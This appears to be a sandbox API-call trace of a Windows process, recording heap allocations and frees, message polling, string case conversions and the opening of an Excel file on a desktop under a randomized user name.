RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0187.779] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.779] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0187.779] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0187.780] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0187.780] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.780] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0187.780] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.781] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.781] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0187.781] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0187.781] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0187.781] CryptDestroyHash (hHash=0xaa57e0) returned 1 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0187.781] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0187.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0187.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0187.782] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0187.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0187.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0187.782] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0187.783] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0187.784] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.785] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0187.785] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0187.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0187.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0187.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0187.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0187.785] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0187.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0187.786] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0187.786] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0187.787] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0187.788] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0187.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0187.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.789] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0187.789] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0187.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.789] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0187.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0187.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0187.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0187.790] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24b7a48 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0187.790] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0187.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/lorGIZR7_Ai6fNrX6f.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lorgizr7_ai6fnrx6f.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a4 [0187.791] SetFilePointerEx (in: hFile=0x2a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.791] SetFilePointerEx (in: hFile=0x2a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0187.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0187.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0187.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0187.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0187.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0187.791] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0187.791] 